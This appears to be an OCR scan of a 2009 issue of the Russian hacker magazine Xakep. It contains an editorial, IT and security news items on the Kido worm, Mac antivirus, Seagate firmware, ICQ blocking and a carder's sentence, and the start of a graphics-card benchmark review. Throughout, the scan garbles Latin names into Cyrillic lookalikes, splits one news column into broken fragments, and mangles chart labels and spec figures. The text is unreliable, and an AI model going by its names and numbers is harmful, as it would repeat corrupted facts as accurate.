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Іпіго 

Начало года выдалосьударным. Неуспели мы с 
Горлумом вернуться из Евротура, какузнали отом, 
что Сквозной поломал ни много ни мало РасеЬоок. Не 
сказать, что меня это прямо очень сильно удивило: за 
годы знакомства со Сквозом я давно привык к прихо- 
дящим в 6-ІаІк ссылкам на различные 501_-инъекции 
и нул-байты на проектахтипа “Ядерный полигон 
Й он до кто н, Северная Корея”. Так что поломка круп- 
нейшей социальной сети мира - это для Сквоза штука 



по расписанию. Но обрадовались мы все-таки несла- 
бо: прекрасная статья, красивый взлом и отличное 
начало года. 

Надеюсь, и дальше все пойдет не хуже :). 



Іпікііогг, гл. ред.ХІ 



ибаіке.ііѵеіоигпаі.сопп 
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МАРИЯ «МІРВІІШ» НЕФЕДОВА 

/ МІГКІІ_І_@ПЕАІ_.ХАКЕР.ПІІ / 



Обо всем за последний месяц 



Вирусы умнеют на глазах 

Крайне неприятная эпидемия компьютерных заболеваний 
опять постигла интернет-юзеров. На этот раз виной всему 
червяк N е1;-ѴѴогт .ѴѴіп32.КісІо р уже заразивший более 
1 0 млн. компьютеров по всему миру. На маши ну червь 
пробирается через очередную критическую уязвимость, 
найденную во всеми любимой МісгозоІІ ѴѴіпсІоѵѵз. После 
проникновения он отключает сервис «восстановление 
системы», закрывает доступ кантивирусным сайтам (в 
частности, нельзя войти на Р-5есиге и Казрегзку І_аЬ], 
а также блокирует адреса, в которых встречаются слова 
таіѵѵаге, зруѵѵаге, ѵігиз и им подобные. После этого червяк 
принимается спокойно скачивать из Сети дополнительный 
малварь. Любой, какой только взбредет в голову хозяину 
червя. Так, например, можно создать классический ботнет. 
Нерасторопным пользователям, не обновляющим вовремя 
антивирусные базы, остается только с ужасом смотреть 
на происходящее, практически не имея возможности 
что-либо сделать. МісгозоД уже выпустила заплатку, уст- 
раняющую уязвимость, а все антивирусные лаборатории 
бьюттревогу. Россия входит в тройку стран, подвергшихся 
наибольшему заражению, такчто советуем попробовать 
заглянуть на официальные сайты антивирусов. Если они 
не грузятся, значит, пора лечиться. 




За последние 5 лет число юзеров рунета выро 



чем в 



2.5 



раза. 



О «яблочных» вирусах никто не забыл 



С тех пор как в конце прошлого года на сайте поддержки Ар ріе по- 
явиласьофициальная рекомендация пользоваться антивирусами, 
Мас-комьюнити лишилось любимого мифа о неуязвимости яблочных 
компьютеров. Конечно, ни одна ОСь не можетбытьзащищена на 100%, 
и «маки»здесь исключением не являются. Другой вопрос, что мал- 
варь под них можно пересчитать по пальцам. Тем не менее, 2009 год 
порадует российских маководов сразу двумя антивирусами для Мае 05 



X — это «Доктор Веб» и «Антивирус Касперского». Обе компании почти 
синхронно раскрыли свои планы. Бета-версия «Доктор веб» для Мае 05 
Хуже доступна для скачивания (бета «Касперского» будет позже, пока 
она находится в стадии закрытого тестирования]. Учитывая, что в рунете 
всего 0.4-0. 5% мак-юзеров, это скорее напоминаетакт альтруизма. На 
продажах антивирусов под «Маки» вряд л и удастся выручить более 
$250.000 в год. 
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Второе 

пришествие 

ЗБ 

Компания ІЧѴібіа выпускает девайс, который 
определенно должен порадовать гейме- 
ров, ценителей всего нестандартного, да и 
просто любителей поэкспериментировать. 
Публике представили новую реинкарнацию 
30 -оч ко в: пѴісІіа ОеРогсе ЗБ Ѵізіоп. Такие 
приборы, конечно, существовали и 1 0 лет 
тому назад, ноте, кому довелось опробовать 
их на себе, должны хорошо помнить несо- 
вершенство устройства и глаза, болящие 
уже после получаса трехмерных забав. 
Сегодня сама технология мало изменилась, 
но благодаря развитию ЖК-дисплеев у нее 
появился второй шанс. Дело в том, что все 
строится на частоте развертки монитора 
— она должна составлять не менее 1 00 Гц. В 
2009 году появятся, как минимум, два таких 
монитора — это Заппзипд ЗупсМазІег 22 м 
2233 Р2 и ѴіеѵѵЗопіс ѴХ2265ѵѵт. Уже известно 
что новый Затзипд будет стоить $399, и эту 
сумму можно смело записывать в комплект к 
очкам, ведь без подходящего монитора ни- 
чего не получится. С видеокартой несколько 
проще — немалая часть продуктов ІЧѴісІіа 
с новинкой прекрасно совместима. Что до 
работы СеРогсе 30 Ѵізіоп, — тут все совсем 
просто: подключил, система настроила де- 
вайс, и можно начинать играть. Для работы с 
игрушками используются профили, которые 
можно как создавать самостоятельно, так 



и выбирать из существующего списка. На 
данный момент в него входит более 350 игр 
(включая почти всю классику), и это далеко 
не предел. Сама система профилей для 
очков, в общем -то, аналогична 5!Ц сее про- 
филями оптимизации производительности. 



Осталось добавить, что ОеРогсе 3 Б Ѵізіоп 
держат за рядку до 40 часов и стоят $1 99. 

Не исключено, что игры будущего будут 
писаться сучетом этих технологий. Во вся- 
ком случае, ІЧѴісІіа уже активно поставляет 
разработчикам оптическое оборудование. 




ХАКЕР 02 /1 22/ 09 



16 % 



населения. 



Види ш ь диск? 
Ия не вижу... 



Нетакужчасто крупные компании признаютсвои промахи и сознаются, 
что выпустили в продажу партию гл ючного железа или недоработанного 
софта. Но компания Зеадаіе на это все же пошла. Бери на заметку 
— жесткие диски Ваггасиба 7200.1 1 , Ваггасиба Е5.2 и Біатопб 
Мах 22, произведенные в конце 2008 года, имеютбаганутую 
прошивку. Из-за нее харды могут не определяться вообще 
или определяться, но какдиски нулевого объема (а 
могут исчезать из системы лишь какое-то время 
спустя). Завидев подобную проблемусука- 
занными моделями, неторопись бежать в 
сервис-центр, сначала попробуй обновить 
прошивку— на официальном сайте 
Зеадаіеуже выложили исправленную 
версию, которая успешно ликвидирует 
досадный баг. Также Зеадаіе представили 
и программу для восстановления информа- 
ции. Если бы все производители реагировали 
на проблемы столь оперативно, вместо того чтобы 
замалчиватьсвои ошибки, юзерам определенно стало 
бы немного проще жить. 



► 005 




^ тедапеѵг 




Соо&іе не дремлет 



«История веб-поиска» в Соодіе, с одной стороны, вещьудобная и интерес- 
ная, а с другой — может о казать самую настоящую медвежью услугу. В США 
осудили господина Ли Харберта, который еще в январе 2005 насмерть сбил 
человека и скрылся с места преступления. И сделали это благодаря его 
истории поисковыхзапросов. Полиции, когда она все же на него вышла, 

Ха рберт заявил, что сбил на своем «Ягуаре» оленя. За давностью лет опро- 
вергнуть это было невозможно, хотя следы столкновения машина хранила 
до сих пор. Зато, обследовав компьютер подозреваемого и обратившись к 



той самой «истории веб-поиска», полицейские обнаружили, что Харберт 
вскоре после ДТП гуглил весьма интересные и не совсем легальные 
способы покупки автозапчастей и вещи вроде «ЬТ-апб-гип». Успокоился 
он натом, что вполнеуспешно нашел сайт, где опубликовали новостьо 
произошедшем по его вине ДТП, и узнал, что личность водителя неуста- 
новлена. Суд посчитал эти доказательства, в купе с остальными уликами, 
достаточными и приговорил Харберта кЗ годам тюрьмы. Получается, что 
даже гуглить уже становится небезопасно. 



УоиТиЬе поставили на тиіе 



Похоже, временам, 
когда УоиТиЬе можно 
было использовать 
в качестве почти 
универсальной под- 
борки музыкальных 
композиций, настает 
конец. На сайте 
принялись новым 
способом бороться 
с нелегальными аудиодорожками — теперьтакие ролики неудаляют 
и не блокируют, в них просто обрезаютзвук. Выглядит все как некое 



изощренное издевательство, учитывая, что в «немое кино» превраще- 
ны уже десятки тысяч видео, и это явно только начало. Такой метод в 
УоиТиЬе считаютболее щадящим, чем удаление —теперь пользователю 
«дают возможность изменить аудиосопровождение, неудаляя видео». 
Купированные ролики снабжаются пояснением, которое врядли нуж- 
дается в переводе: «ТЫз ѵібео сопіаіпз ап аибіо Шаек ібаі: баз поі Ьееп 
аиШогізеб ЬуаІІсоругідЫ: Ьоібегз. ТЬеаисІіо баз Ьееп б ізабіесі». Логично 
предположить, что однажды рядом с этим уведомлением появится 
предложение заплатить несколько центов за возможность прослушать 
трек и соответствующая кнопка. Похоже, УоиТиЬе, наконец, сдался на 
милость правообладателей или получил «предложение, от которого 
нельзя отказаться». 




Нч из» («№» н п« гш и» ыдош 0 С. МК Пч «ийи М* 4 
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Китайских фармеров взяли на учет 



Засилье наших братьев с востока практически 
во всех мморпготлично знакомо всем, кто хотя 
бы раз пересекался с нынешними онлайновы- 
ми игрушками. Онидавнои прочно поставили 
на поток прокачку персонажей, конвертацию 
игровых валют в реальные деньги и продажу 
редких внутриигровых вещей. И тот факт, что 
тамошним властям такое положение совсем не 
нравится, тоже широко известен. У правитель- 
ства Китая, очевидно, лопнулотерпение, итам 
решили пойти на радикальные меры. Теперь 
каждый геймер, желающий иметь доступ к 
мморпг и другим сетевым играм, будетобязан 
заполнить специальную форуму, предоставив 
полную информацию о себе, включая полное 
имя и номерудостоверения личности. Подается 
все это под благовидным предлогом — мол, 
надеются сократить количество случаев, когда 
люди умираютза компьютерами или сходятс 
ума, забывая за игрой даже о сне и пище (на 
востоке это действительно начинает походить 
на реальную проблему). Нотакже это должно 
помочь и в борьбе с«бизнесом» фармеров, 
с которого те, разумеется, не платят никаких 
налогов. 




► 006 
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У 0$есКС появился сайт 
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Отныне по адресу сізесга.ги можно найти посвященный информаци- 
онной безопасности сайт, созданный компанией ОідіІаІЗесигіІу. Это 
— одна из крупнейших консалтинговых компаний в России, уже более 7 
лет предоставляющая услуги в данной области. Год назад ОідіІаІЗесигіІу 
открыли собственный исследовательский центр — ЭЗес РезеагсЬ Огоир, 
работа которого сконцентрировалась вокруг поиска и исследования 
уязвимостей различных приложений и систем. Ранее информация 
о выявленных ими уязвимостях публиковалась в списках рассылки 
ЗесигіІуЕосиз и на портале Міілл/Огт.сот, а теперь для этого появился 
сайтбзесщти. Помимо упомянутой инфы там будут присутствовать и 
статьи, написанные специалистами ОЗесПС, и актуальные новости. 

Годовой прирост пользователей Тѵѵійег’а 

составил 753 %. 




Кибер-полиция во всей красе 



Борьба с реальной преступностью уже давно затрагивает 
виртуальное пространство. Для правоохранительных органов 
интернети нынешниетехнологии представляют собой весьма 
удобный и полезный инструмент. Еще один практичный метод 
его использования будут осваивать полиция Великобрита- 
нии и МІ5 — им разрешили безо всякого судебного ордера 
отслеживать, чем люди занимаются в Сети. Делать подобное 
можно, если человек подозревается в совершении преступ- 
ления, наказаниеза которое превышаетЗ года тюремного за- 



ключения. Болеетого, стражам порядка в целях «прослушки» 
разрешили устанавливать на машину подозреваемого трояны 
(присылая их, например, по е-таіі) или вести перехватин- 
формации, передаваемой по беспроводным сетям. Борцы за 
права человека негодуют, а сами британцы немало шокирова- 
ны. Если правительства разных стран продолжат действовать 
в подобном ключе, то весьма скоро китайцы, запертыеза 
«Золотым щитом», перестанут чувствовать себя обделенными 
и обиженными — в одной лодке сними окажутся все! 



Раіт 8ігіке$ Ьаск 

Вот и произошло долгожданное для многих событие — компания Раіт, 
практически возродившись из пепла, представила нам новый продукт. 
Смартфон Раіт Рге, на базе новой ОС — ѵѵеЬОЗ, был продемонстри- 
рован публике на выставке СЕ5 2009 и вызвалу присутствовавших, 
а позже и в Сети, бурю положительных эмоций. Выполненный в виде 
слайдера с ОѴѴЕРТУ-клавиатурой, коммуникатор весьма эргономичен 
— 59.5x100.5x16.95 мм и веситвсего 136 граммов. Солидный мультитач- 
экран, созданный потойже технологии, что и экран для і РГіопе, имеет 
размер З.Г, разрешение 320x480 точек и исправно понимает пользо- 
вательские жесты. На борту девайса присутствует камера на 3 Мп, он 
поддерживаетѴѴіЕі, ВІиеЕооЕЬ, СРЗиЗС ЕѴБО геѵ. А, имеет разъем для 
наушников 3.5 мм и датчикдвижения и комплектуется 8 Гб памяти. К 
сожалению, слота для карт памяти нет. Опционально смартфон может 
комплектоваться беспроводным зарядным устройством ТоисЬЗіопе и 
специальной задней крышкой. Тогда, чтобы зарядить Раіт Рге, доста- 
точно положить его на зарядку сверху и он, благодаря магниту, тутже к 
ней прилипнет. Займет процесс полной зарядки порядка 4 часов. Раіт 
Рге — первый серийный аппарат, использующий этутехнологию. Новая 
ѴѴеЬ 05, какбыло известно и ранее, базируется на Ыпих и ПО, в основе 
которого лежат НТМЕ и ЗаѵаЗсгірГ Новая ОС интересна многим, в част- 
ности, здесь впервые реализовали на практике идею онлайн-приложе- 
ний. Также, в ѵѵеЬОЗ привязали все сообщения, полученные отчеловека, 
ксамому контакту, а не ксервису, которым он пользовался — будьто 5М5 
или ІМ-программа. Цена телефона пока неизвестна, но продажи в США 
планируют начать уже в первой половине 2009 года. 
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БіѵХ подружился с «матрешкой» 



Хорошая весть от компании ОіѵХ — начиная с 7-й версии, которая 
вышла в свет в январе 2009, в спецификацию нового формата ОіѵХ 
Ріиз НО включена поддержка кодека Н.264 и контейнер «матреш- 
ка» (Маігозка, .МКѴ]. Это означает, что в самом скором будущем 
на новых проигрывателях с поддержкой ОіѵХ можно будет без 
проблем воспроизводить файлы в формате .ткѵ. Данный формат 
уже давно стал в Сети одним из лучших решений, когда дело ка- 



сается оцифровки и сжатия видео в НО, но до недавнего времени 
его поддерживали единицы бытовых проигрывателей, и те — с 
переменным успехом. Теперь же компании Бідта Оезідпз и Тгісіепі 
Місгозузіетз, первыми лицензировавшие новый пакет кодеков, 
уже занимаются производством микросхем, которые совсем скоро 
попадут на рынок. Наконец-то .ткѵ можно будет смотреть не толь- 
ко на компьютере! 




28 % рабочего времени в Сети расходуется на чтение е-таіі, переписку 

Фотоаппарат с браузером 



Технический прогресс скоро дойдет до того, что ЖК-дисплеи будут 
встраивать в чайники и холодильники, и ни в чем не повинную бытовую 
технику повально оснастят выходом в интернет. Вот и компания 5опу 
уже подошла к подобному вплотную, представив фотоаппарат Бопу 
СуЬегБЬоЮЗ, оснащенныйтачскрином 3.5" и поддержкой ѴѴі-Рі. В 
камеру интегрирована купированная вариация браузера, позволяющая 
пользователю работать напрямую ста кими сетевыми сервисами как 
ѴоиТиЬе, РЬоІоЬискеІ, БНіЖегйу и такдалее. Но все же это не совсем 



«браузер» — строки ввода адреса, кактаковой, в нем не предусмотрено. 
Бопу предлагает закачивать снимки и видео в Сеть прямо с камеры, 
минуя промежуточные стадии вроде заливки информации в компью- 
тер. Стехнической же точки зрения СуЬегБЬоІ: 03 представляет собой 
10-мегапиксельную камеру с оптикой СагІХеізз, 4-кратным оптическим 
зумом и 4 Гб встроенной памяти (слот для Бопу Метогу БИ ск тоже на 
месте]. Цена первого в мире фотоаппарата, умеющего выходить в интер- 
нет, составляет $500. 



Из-за кризиса Місгозой уволит 5.000 человек. Это 5 % от общего числа сотрудников 
компании. 



► 008 
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АОЬ продолжает крестовый поход 



#іся 



тш й 





Компания Атегіса опііпеуже не раз пыталась насильно пересадить 
пользователей ІСО с альтернативных клиентов на официальный, 
увешанный рекламными баннерами, как новогодняя елка — менялись 
протоколы, придумывались все новыеухищрения. Очередной раунд 
противостояния не заставил себя ждать — 21 -го января все альтер- 



нативные ісц-программы вновь приказали долго жить, но на этот раз 
начали выясняться интересные подробности. В частности, блокировка 
затронула только территорию СНГ. Официальный сайт ІСО при этом 
продемонстрировал пользователям из стран СНГ сообщение отом, что 
не поддерживает«сервисы-подражатели». Разработчики Мігапба и 
01 Р, не теряя времени, начали поиски решения проблемы, и уже к 1 .00 
ночи по Москве появилась новая сборка 01 Р, а чуть позже — исправ- 
ленная Мігапба. Но сервера ІСО, словно в ответ, вдругснова начали 
выборочно подключать людей со старыми альтернативными клиента- 
ми. Так как никаких официальных комментариев со стороны АО Г или 
представителей компании «Рамблер» не последовало, остается лишь 
гадать, что это — отступление или смена тактики. Зато совершено ясно 

— А01_ в очередной разтеряеточки в глазах пользователей, заставляя 
их искать альтернативы своим продуктам. Очень показательный факт 

— за пол дня «молчания» ІСО несколько русскоязычных ресурсов, пос- 
вященных замечательному протоколу 0 а Ь Ь е г, попросту не выдержали 
нагрузки и обвалились. Наши юзеры действительно быстрее перейдут 
на 0 а Ь Ь е г, чем поставят себе официальную ІСО 6.5. Уже всем, кроме 
А01_, очевидно, что менять нужно не методы борьбы с «подражателя- 
ми», а свой продукт. 



Почтовый спам-трафик, упаі 

7.7% (всего 81.4%в 



МІСГ080Й снова судят 




У МісгозоГ опять проблемы в суде и снова из-за доминирующего 
положения на рынке. На этот раз виной всему браузер «мелкомягких» 

— Іпіепеі Ехріогег. Еще в конце 2007 года норвежцы из Орега ЗоІТѵѵаге 
подали на МісгозоГ жалобу, которую поддержало и европейское 
представительство Егее ЗоГѵѵаге ЕоипбаОоп. Суть жалобы в том, что 
включение ІЕ в комплект поставки ѴѴіпсІоѵѵз (а МісгозоГ поставляют 
их вместе с 1996 года] препятствует здоровой конкуренции на рынке 
браузеров, мешает совершенствовать ПО, да и вообще: «так нечестно». 



В США включение ІЕ в ѴѴіпсІоѵѵз было признано легальным в 2002 году, 
но в Европе эту ситуацию еще только предстоит прояснить. Совет по 
конкуренции при Еврокомиссии уже прислал МісгозоГ официальное 
сообщение, где констатировал, что, с позиций Брюсселя, комплект 
ѴѴіпсІоѵѵз+ІЕ действительно выглядит нехорошо и нарушает европейс- 
кие законы о конкуренции. Теперь у МісгозоГ есть 8 недель, в течение 
которых они должны либо составить официальный ответ Еврокомиссии 
либо назначить дату слушаний. 
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Перемены в іТипез 



В апреле 2009 мы увидим логическое завер- 
шение истории «Арріе и йРМ». Интернет- 
магазин іТипез наконец-то откажется от 
использования цифровой защиты музы- 
кальныхтреков ЮРМ), о которой еще в 2007 
очень нелестно высказывался Стив Джобс. К 
этому готовились давно и на данный момент 
уже 80% треков, выставленных на продажу, 
не имеют йРМ, а значит, их можно проигры- 
вать на любом трЗ-плеере и копироватьс 
одного устройства на другое неограничен- 
ное количество раз. Но придти квзаимопо- 
ниманию с правообладателями получилось 
не сразу. В конечном счете остановились 
на следующем варианте — с апреля месяца 
треки в ІТипеБ будут стоить не $0.99, как это 
было всегда. Отныне будетдва варианта: 
треки по 69 центов и по $1 .29. Определять 
цену песни будут сами музыкальные издате- 
ли. Впрочем, в Арріе уже сейчас уверяют, что 
треков по $0.69 будет больше. 





Когда компьютер вдруг чел з 
«Скачивание — это плохо!»! 
жественном вмешательстве л. 
окажется второе. Некая груг і 
торренты троян Тпф/ОЬозІ:- 
машине доступ ккрупнейши 
т.д.], после чего воспроизво, 

— плохо!». Малварь весьма 
серийников, так что скачал 



еческим голосом говориттебе, что 
олей неволей задумаешься о бо- 
іли о вирусе. И скорее всего, верным 
а шутников распространила через 
, который блокировал на зараженной 
і трекерам (ТЬе Рігаіе Вау, Міпіпоѵа и 
ил звуковой файл, заявляя: «Качать 
щчно замаскировали под генератор 
го многие. Зато принцип блокировки 



выбрали самый топорный — троян просто залезал в зуз1:епп32\ 
бгіѵегз\еІс\Ьо5І;5 и редактировал Ьозіз, перенаправляя все запросы 
к треке рам на 1 27.0.0.1 . Админы ТЬе Рігаіе Вау довольно быстро 
удалили «криминальную» раздачу, а позже последовали коммента- 
рии. Так, сайтТоггепіРгеак расценивает случившееся, как шутку, и 
сомневается, что к этому причастны анти пираты из РІАА. Что ж, мы 
тоже сомневаемся :]. Но стоит заметить, что это, конечно, не первый 
случай, когда торренты пытаются использовать для распростране- 
ния вредоносных программ. 



► ОІО 
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ѴѴіп(1ош8 7 — бета 




Каки было запланировано, бета-версия ѴѴіпсІоѵѵз 7 отправлена в свобод- 
ное плавание, то есть, выложена в открытый доступ. На протяжении 
января месяца скачать бету новой ОС с сайта МісгозоК моглюбой жела- 
ющий, а теперь 7-ая расползлась поторрентам и фа йлообмен никам. В 
МісгозоіЧ признаются, что не ожидали такого ажиотажа вокруг бета-вер- 
сии — сервера компании неоднократно падали из-за количества людей, 
жаждущих скачать дистрибутив, и, в итоге, пришлось даже отказаться 
отзадуманного ранее лимита. Вначале предполагалось, что скачать 
бету смогуттолько первые 2.5 млн. человек. Для установки ѴѴіпсіоѵѵб 7 
необходима машина с32- или 64-битным процессором, частотой не 
ниже 1 ГГц, не менее 1 Гб ОЗУ — и видеокарта с 1 28 Мб видеопамяти для 
запуска интерфейса Аего, а также порядка 16 Гб свободного места на 
диске. Официально бета-версия будет работоспособна до августа 2009, 
после чего придется либо ставить новый релиз, либо возвращаться на 
более старую «Винду». 



Выход 2Р2 дляѴізіа отложен на 1~2 месяца 

(май или июнь 2009) 



Энциклопедия 
для ІТ-шников 




На декабрь 2008 количество 
уникальных посетителей Тѵѵійег равнялось 

4.43 миллионам человек в день. 



Пойман — вор 



Одного из известнейших кардеров современности —украинца Максима 
Ястремского ака Макзік — осудили, приговорив к 30 годам лишения 
свободы. Напомним, что Ястремского арестовали в 2007 году в Турции, 
куда он приехал отдыхать. Отдыхать в стране, у которой есть договорен- 
ность о сотрудничестве с правоохранительными органами США, вто 
время, какты находишься в международном розыске, очевидно, было 
не самым лучшим решением. На счету кардера к тому моменту было по- 
рядка 1 1 млн. ворованных долларов, втом числе, из 12турецких банков. 
В 2005-2007 годах Ястремскому с подельниками удалось проникнуть 
в базу данных "ПІХ, откуда они и «увели» более 40 миллионов номеров 
кредитных и дебетовых карт. Впоследствии ворованной информацией 
нетолько пользовалисьсами, но продавали ее в Сети. И хотя вТурции 
Макзікукрал со счетов «всего» $23.200, ни Штатам, ни кому-либо еще 
его выдавать не стали, решив судить самостоятельно. Итог — 30 лет 
тюрьмы. В Турции. Интересно, те 1 1 миллионов этого стоили? 



На просторах рунета появиласьсвоя собственная вики-энциклопедия, 
посвященная исключительно информационнымтехнологиям — ІТребіа. 
ги. Примечательно, что зарубежных аналогов у сего начинания попросту 
нет. Проект основан в прошлом году фондом «Айтипедия», созданным 
специально для проекта. Ресурс функционирует на движке МебіаѴѴікі. 
Как и ѴѴікіребіа, он опирается на лицензию 01\Ю Р01_. К моменту за- 
пуска было готово более 400 статей, а сейчас активно пишутся новые. 
Дополнить ІТребіа может каждый, регистрация здесь необязательна. 
Монетизироваться сайт не собирается, и, по словам организаторов, их 
вложения минимальны — по сути, это только оплата хостинга. Поста- 
вив перед собой задачу создать единую базу ІТ-знаний, «Айтипедия» 
замахнулась на очень серьезное начинание. Чтобы все заработало как 
должно, проекту понадобится множество авторов, да и за объектив- 
ностью статей, конечно, придется следить очень и очень внимательно. 
Пожелаем ребятам удачи! 
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СЕРЬЕЗНОЕ ВИДЕО 
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теггит 



ВГЕНИИ ПОПОВИАЛЕКСЕИ ЕФРЕМОВ 









ТЕСТИРОВАНИЕ ПОСЛЕДНИХ МОДЕЛЕЙ ВИДЕОКАРТ 



стан а □ -ішт — гш 

Сколько ни уделяй внимания прочим хобби, а компьютерные игры — одь 
составляю щих жизн и компьютерного фрика. И даже есл и ты та ковым неявля- 
ешьс я, игровая инд у стри оді вно уже ушла от одноо^азиятетриса неолите^ 



ак что, если ты задумал как следует прокачать свою тачку для виртуальных 






аталии, начать модернизацию нужно именно с корн 



зол — с мощной 



видеокарты. 






В ВОЗМОЖНОСТИ УСТРОЙСТВ 

На нашемтестовом стенде была установлена операционная система 
ѴѴіпсІоѵѵз Ѵізіа с пакетом столь необходимых обновлений 5Р1 . Конечно, 
система далека от совершенства, однако именно этот факт позволитобъ- 
ективнее оценивать результаты тестирования, поскольку версия ХР будет 
более эффективно работать со всеми современными играми — доказано 
на практике! Что касается набора тестовых программ, то мы использо- 
вали, в первую очередь, синтетические бенчмарки от ЕіТигетагк. Это и 
ЗЭМагк’Об, ставший уже классикой мировых измерительных систем, а 
также новый, заточенный специально для Ѵізіа, набор ЗйМагк Ѵапіаде. 

В качестве игровых приложений, которые, без сомнения, являются зер- 
калом потенциала и реальных возможностей видеокарт, были выбраны 
четыре различных платформы. Игры Сгузіз, Оеѵіі Мау Сгу 4, Сотрапу 
об Негоез и СаІІоУиагег заставляют серьезно нагружать даже самое 
производительное железо, так что такая ставка неслучайна. Измерения 
производились при разрешении 1600x1200, с использованием анизот- 
ропной фильтрации (х 1 6] и антиалиасинга (х4). Естественно, все игры 
работали с поддержкой набора Оі гесбХ 10. Результаты можно видеть на 
графиках, прилагаемых кстатье. 



ЦШЫЯІ'ЛШТГЯ 

Процессор: I пбеі Соге 2 Оиаб, 3 ГГц 
Системная плата: Азиз 5бгі кег II Ехітете 
Чипсет системной платы: пѴІВІА пЕогсе 790і 111.1га БЫ 
Оперативная память: 8192 Мб (ООРЗБОРАМ] 

Жесткий диск: 1 Тб, ѴѴЭС ѴѴЭ10 ЕАС5-002ЭВ0 5С5І, 

Операционная система: МісгозоО: ѴѴіпбоѵѵз Ѵізіа ІІШтабе Бегѵісе Раск 



Список протестированного 
оборудованияЛ^ЕШШ 



• ѲідаЬуІе 0Ѵ-ЫХ881І768Н-В (ѲеРогсе 8800 Шіга] 

• ѲідаЬуІе 6Ѵ-ЫХ98Х1 6Н І-В ІбеРогсе 9800 6ТХ] 

• ѲідаЬуІе 6Ѵ-ЫХ98Х512Н-В (6еРогсе9800 6X2] 

• ЗаррНігеТохіс И 0 4850 5 1 2 М 600РЗ ІРаОеоп РЮ 4850 Тохіс] 

• ЗаррЫге РЮ 4870 Х2 26 600В5 (РаОеоп РЮ 4870 Х2] 

• ХРХ 6Х-280Ы-2ОО9 (беРогсе 6ТХ 280] 



► 012 
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РЕѴИ МАѴСКУ, 1600X1200, 4ХАА, ІбХА 



ХРХ6Х-280Ы-2009 

БаррЫге НО 4870X2 26 С00К5 

БаррЫге Тохіс Нй 4850 512М бОйВз 

ОідаЬуІе 6Ѵ-ЫХ98ХЮНІ-В 

6ідаЬуІе6Ѵ-ІМХ881І7б8Н-В 

6ідаЬуІе6Ѵ-ІМХ881І7б8Н-В 

О 20 40 60 80 100 120 140 160 180 

ерз 

В этом игровом приложении наблюдается влияние двух графических 
чипов, которые работают в связке на одной плате. Не зря мы сделали 
ставку именно на эту игру! 



СКѴ5І5, 1600X1200, 4ХАА, ІбХАР 



ХРХ6Х-280Ы-2009 

БаррЫге НО 4870X2 26 600В5 

БаррЫге ТохісНР 4850 512М600ВЗ ^ ш 

6ідаЬуІе6Ѵ-МХ98ХібНІ-В 

СідаЬуІебѴ-ЫХ98Х5і2Н-В 

6ідаЬуІе6Ѵ-ІМХ881І7б8Н-В 

О 5 10 15 20 25 30 35 

ерз 



Отрыв от конкурсантов можно списать на ошибку в измерениях, но наши 
результаты достоверны: при серьезных нагрузках платы на базе схем 
АМО способны творить чудеса 





Графический чип: 680ІІ 
Количествотранзисторов, млн: 681 
Технологический процесс, нм: 90 
Частота работы чипа, МГц: 612 

Частота работы памяти, МГц: 1080 (21 60 эффективная) 

Объем памяти, МБ: 7б8бОйРЗ 

Ширина шины, бит: 384 

Пропускная способность шины, Гбит/с: 101,3 

Поддерживаемый интерфейс: РСІ Ехргезз 2.0 хіб - 




Графическая плата ОідаЬуІе 6Ѵ-ЫХ881І768Н-В основана на процессоре 
08011, на базе которого производятся адаптеры категории Шга. Аэто 
означает больше возможностей и больше производительности. Восьмая 
серия карт ІМѴЮІА еще вполне себе ничего — топовые платы позволятиг- 
ратьна максимальных скоростях, да и цены пониже более совершенных 
вариантов. Чип изготовлен сучетом ревизии АЗ. Это позволило снизить 
энергопотребление, а также увеличить частотный потенциал (что весьма 
порадует оверклокеров). Дизайн печатной платы, каки охладитель, 
благо, мало отличаются от референсного варианта. Впрочем, эта деталь 
характерна для всех высокопроизводительных моделей видеокарт. В 
комплекте с устройством поставляются игры Биргете Соттапбег и 
ѴѴагбат тег 40000 Баѵѵп оІѴѴаг. Также счастливый покупатель найдет 
необходимый набор переходников и диске драйверами. 

0 

Отметим немаленькие габариты устройства — они не позволятуста- 
новить плату даже в корпус средних размеров. Длина видеокарты: 27 
см. Несмотря на размеры охладителя, температурный режим все еще 
слишком высок. Кулер работает на всю катушку, и шум от вентилятора 
достаточно сильный. 




бідаЬуІе 6Ѵ-ЫХ98Х512Н-В 

Технические характеристики^ 



Графический чип: 6926ТХ 
Количествотранзисторов, млн: 754 
Технологический процесс, нм: 65 
Частота работы чипа, МГц: 675 

Частота работы памяти, МГц: 1100 (2203 эффективная) 

Объем памяти, МБ: 512 бйОРЗ 
Ширина шины, бит: 256 
Пропускная способность шины, Гбит /с: 68,8 
Поддерживаемый интерфейс: РСІ Ехрге552.0хі6 
Выходы : 2 х РѴІ, 5-ѴісІео 

••••••••00 

т 

Девятая серия видеокарт на базе чипов от ІМѴЮІА стала настоящим 
откровением для поклонников компьютерных игр. Компания Оідабуіе, 
будучи одним из ведущих партнеров вышеупомянутого чипмейкера, в 
числе первых представила эту модель на рынке. В комплекте не нашлось 
достаточного количества сопутствующих материалов, которые можно 
представить в качестве подарков. Нет в наборе и игр, однако это компен- 
сирует потрясающая производительность устройства. Среди особен- 
ностей платы — чип 692, изготовленный с использованием 65-нано- 
метрового техпроцесса, 512 Мб видеопамяти класса бОБРЗ, атакже 
поддержка технологий НуЬгубРоѵѵег (работа совместно со встроенным 
видеоконтроллером чипсета] и 3-ѵѵау БЫ (работа в режиме БЫ одновре- 
меннотрех видеокарт). Единственным отличием данной видеокарты от 
прототипа является наклейка на системе охлаждения. Все остальное, 
включая частоты, разводку платы, ширину шины и количество конвейе- 
ров осталось неизменным. 

0 

Соотношение цены и производительности в данном случае выше, 
нежели утой же ОідаЬуГе 6Ѵ-ЫХ881І768Н-В, но не идет в сравнение с 
более совершенными адаптерами. Большие размеры также не являются 
достоинством. 
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ЗйМАКК ѴАЫТА6Е, ОѴЕКАЫ. 



БаррЫге Нб 4870X2 26 606К5 
бідаЬуІе 6Ѵ-ІМХ98Х16НІ-В 
ХРХ6Х-280Ы-2009 
бідаЬуІе 6Ѵ-ЫХ98Х512Н-В 
бідаЬуІе 6Ѵ-ЫХ881І768Н-В 

ЗаррИігеТохіс НЮ4850 512М ОйОРз ^ ■ 

О 2000 4000 6000 8000 10000 12000 14000 

Магкз 



Результаты тестирования в этом бенчмарке весьма неоднозначны. 
Лидерство удерживают адаптеры на базе схем от ІЧѴІБІА, однако плата 
на базе Рабеоп НБ 4850 с явным отрывом обгоняеттоповую модель 
восьмой серии 



бідаЬуІе 6Ѵ-МХ98 Хі6НІ-В| 

Технические характеристиюіД 



Графический чип: 2хб92бХ 
Количествотранзисторов, млн: 754x2 
